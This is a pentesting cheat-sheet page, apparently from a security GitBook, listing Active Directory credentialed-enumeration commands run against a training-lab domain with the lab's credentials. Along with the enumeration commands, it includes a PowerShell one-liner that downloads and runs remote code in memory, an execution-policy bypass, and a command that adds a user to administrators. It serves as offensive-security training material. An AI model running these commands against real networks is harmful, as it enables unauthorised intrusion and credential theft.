Martian Defense NoteBook
  • Martian Defense Notebook
  • Training and Career
    • Keeping it Real for Beginners
    • Reading and Repos
    • Media
    • Guides
      • Cybersecurity Roadmaps
      • Cybersecurity Training Topics
      • AppSec Training Pathway
      • Interview Checklist
    • Platforms
      • General
      • Offensive Security
      • Defensive Security
      • CTF Sites
      • Live Vulnerable Sites
    • Entrepreneurship Roadmaps
      • Consulting
      • Starting a Business
  • Technical Resources
    • Offensive-Cybersecurity
      • Application Security
      • General
      • Recon + OSINT
      • Infrastructure Pentesting
      • Cloud Pentesting
      • Wordlists
      • Social Engineering
      • Mobile Pentesting
      • Container Security
      • Blockchain
    • Defensive-Cybersecurity
    • General Cybersecurity
      • Cybersecurity Operating Systems
    • Coding/Programming
    • Reverse Engineering
    • AI and ML
  • Notes
    • Product Security Engineering
      • DevSecOps
        • Docker
          • How to Dockerize Applications with Docker Compose (Using SQLite and Flask)
      • SAST/SCA
        • How to setup a GitHub Action for Code Security analysis
        • JavaScript Security Analysis
        • Java Security 101
        • Tools
        • CodeQL for Beginners
      • Product Security Hardening
      • Threat Modeling
      • PHP Security
    • AppSec Testing
      • Checklists
        • WEB APP PENTESTING CHECKLIST
        • API Testing Checklist
        • Android Pentesting Checklist
        • IoS Pentesting Checklist
        • Thick Client Pentesting Checklist
        • Secure Code Review Checklist
      • Targeted Test Cases
        • Part 1
        • Part 2
      • Common Web Attack and Prevention List
      • Ports and associated Vectors
      • DNS
      • Web Tools
      • Command Injection Testing
      • JWTs and JSON
    • Security Research
      • Publishing CVEs
      • Threat Intelligence
      • Shodan Dork Cheatsheet
      • Github Dorks
      • Bug Bounty
        • Bug Bounty Programs
      • Forums
    • Coding/Programming
      • Secure Coding Practices Checklist
      • JavaScript
      • Python
        • Quick Notes
        • Python Basics for Pentesters
        • Python Snippets
        • XML Basics with Python
      • Golang
        • Theory
        • Security
        • Modules
        • Entry Points
        • File Forensics
        • Cryptography and Encoding
        • Golang Snippets
      • PHP
        • Setup
        • Syntax
        • Variables and Data Types
        • Control Structures
        • Arrays
        • Functions
        • OOP Concepts
        • Database Integration
        • Handling HTTP Methods
        • Session Management
        • File Uploads
        • Email Function
        • Error Handling
        • Advanced Topics and Best Practices
    • Network Security
      • Domain Trust Enumeration
      • Bleeding Edge Vulnerabilities
      • Post-Exploitation
      • Access Control Lists and Entries (ACL & ACE)
      • Credentialed Enumeration
      • Password Attacks
        • Internal Password Spraying
        • Remote Password Attacks
        • Linux Local Password Attacks
        • Windows Local Password Attacks
        • Windows Lateral Movement
      • PowerView
      • Pivoting, Tunneling and Forwarding
        • Advanced Tunneling Methods
        • Dynamic Port Forwarding (SSH + Socks)
        • Port Forwarding Tools
        • SoCat
      • Linux Privilege Escalation
      • Windows Privesc
        • OS Attacks
        • Windows User Privileges
        • Windows Group Privileges
        • Manual Enumeration
        • Credential Theft
      • Kerberos Attacks
        • Kerberos Quick Reference Sheet
    • Cloud Security Testing
    • Defensive Security
      • Splunk
        • Basic Queries
        • Dashboards
      • Forensics
        • Volatility
      • WireShark filters
    • Governance, Risk, Compliance
      • Vulnerability Management Lifecycle
    • Capture-the-Flag Training
      • Vulnerable Machine Checklist
      • Reverse Engineering Checklist
      • Mobile Checklist
      • Forensics Checklist
      • Binary Exploitation
      • Cryptography Checklist
    • Reporting
    • PowerShell
    • Linux Basics
    • Basic IT Tasks
  • Digital Privacy and Hygiene
    • Personal Information Removal Services
    • De-Googling Android
    • DNS Services
    • Privacy References
    • Opsec
  • RedPlanet Labs
    • PyGOAT
    • OWASP Juice Shop
Powered by GitBook
On this page
  • Credentialed Enumeration - Linux
  • CrackMapExec
  • SMBMap
  • RPCclient
  • WindapSearch
  • BloodHound-py
  • Credentialed Enumeration - Windows
  • Active Directory PowerShell Module
  • PowerView
  • Credentialed Enumeration With Built-In Tools
  1. Notes
  2. Network Security

Credentialed Enumeration

Credentialed Enumeration - Linux

CrackMapExec

Domain User Enumeration

sudo crackmapexec smb <IP> -u forend -p Klmcargo2 --users

Domain Groups Enumeration

sudo crackmapexec smb <IP> -u forend -p Klmcargo2 --groups

Domain Logged On Users

sudo crackmapexec smb <IP> -u forend -p Klmcargo2 --loggedon-users

Domain Share Searching

sudo crackmapexec smb <IP> -u forend -p Klmcargo2 --shares

sudo crackmapexec smb <IP> -u forend -p Klmcargo2 -M spider_plus --share 'Department Shares'

SMBMap

List Shares

smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H <IP>

Recursive List Shares

smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H <IP> -R '<share-name>' --dir-only

RPCclient

UserEnum by RID

HTB_@cademy_stdnt! <RID>

WindapSearch

Search Domain Admins

python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 --da

Search Privileged Users

python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 -PU

BloodHound-py

Enumerating Everything

sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all

Credentialed Enumeration - Windows

Active Directory PowerShell Module

# Import Module
Import-Module ActiveDirectory

Domain Info

Get-ADDomain

Users Info

Get-ADUser

Trust Relations

Get-ADTrust -Filter *

Group Info

Get-ADGroup -Filter * | select name

Detailed Group Info

GetADGroup -Identity <group-name>

Group Memebership

Get-ADGroupMember -Identity <group-name>

PowerView

Domain Information

Get-Domain

Show Domain Controller

Get-DomainController

Show all Users

Get-DomainUser

Show All Computers

Get-DomainComputer

Show all Groups

Get-DomainGroup

Showe specific OU objects in AD

Get-DomainOU

Show Specific ACL's

Find-InterestingDomainAcl

Show members of a specific domain group

Get-DomainGroupMember

Show all GPO

Get-DomainGPO

Show User GPO Rights

# Change this to the user
$sid=Convert-NameToSid "Domain Users"

# Check Rights
Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}

Show Domain Policy

Get-DomainPolicy

Show Local Groups

Get-NetLocalGroup

Show members of a specific local group

Get-NetLocalGroupMember

Show Domain Shares

Find-InterestingDomainShareFile

Show machines on the local domain

Find-LocalAdminAccess

Show Domain Trust

Get-DomainTrust

Show all forest trusts for the current forest or a specified forest

Get-ForestTrust

Show Trusts in all

Get-DomainTrustMapping

Find Password In Users Description

Get-DomainUser * | Select-Object samaccountname,description |Where-Object {$_.Description -ne $null}

Find Passwd_NOTREQ

Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol

DONT_REQ_PREAUTH

Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

Snaffler

https://github.com/SnaffCon/Snaffler

Help us acquire credentials or other sensitive data in an Active Directory environment. Snaffler works by obtaining a list of hosts within the domain and then enumerating those hosts for shares and readable directories.

Snaffler.exe -s -d inlanefreight.local -o snaffler.log -v data

Credentialed Enumeration With Built-In Tools

Basic Enumeration Commands

# Prints the PC's Name
hostname 

# Prints out the OS version and revision level
[System.Environment]::OSVersion.Version

# Prints the patches and hotfixes applied to the host
wmic qfe get Caption,Description,HotFixID,InstalledOn

PowerShell Enumeration Commands

# Lists available modules loaded for use.
Get-Module 

# Will print the execution policy settings for each scope on a host.
Get-ExecutionPolicy -List 

# This will change the policy for our current process using the -Scope parameter. Doing so will revert the policy once we vacate the process or terminate it. This is ideal because we won't be making a permanent change to the victim host.
Set-ExecutionPolicy Bypass -Scope Process 	

# Return environment values such as key paths, users, computer information, etc.
Get-ChildItem Env: | ft Key,Value

# This is a quick and easy way to download a file from the web using PowerShell and call it from memory.
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"

# Status Firewall
netsh advfirewall show allprofiles

# Status Windows Defender
Get-MpComputerStatus

Net Commands

# Information about password requirements
net accounts

# Password and lockout policy
net accounts /domain

# Information about domain groups
net group /domain

# List users with domain admin privileges
net group "Domain Admins" /domain

# List of PCs connected to the domain
net group "domain computers" /domain

# List PC accounts of domains controllers
net group "Domain Controllers" /domain

# User that belongs to the group
net group <domain_group_name> /domain 

# List of domain groups
net groups /domain 	

# Lst users that belong to the administrators group inside the domain (the group Domain Admins is included here by default)
net localgroup administrators /domain

# Add user to administrators
net localgroup administrators [username] /add 	

# Check current shares
net share

# Get information about a user within the domain
net user <ACCOUNT_NAME> /domain

# List all users of the domain
net user /domain 	

# Get a list of computers
net view
PreviousAccess Control Lists and Entries (ACL & ACE)NextPassword Attacks

Last updated 5 months ago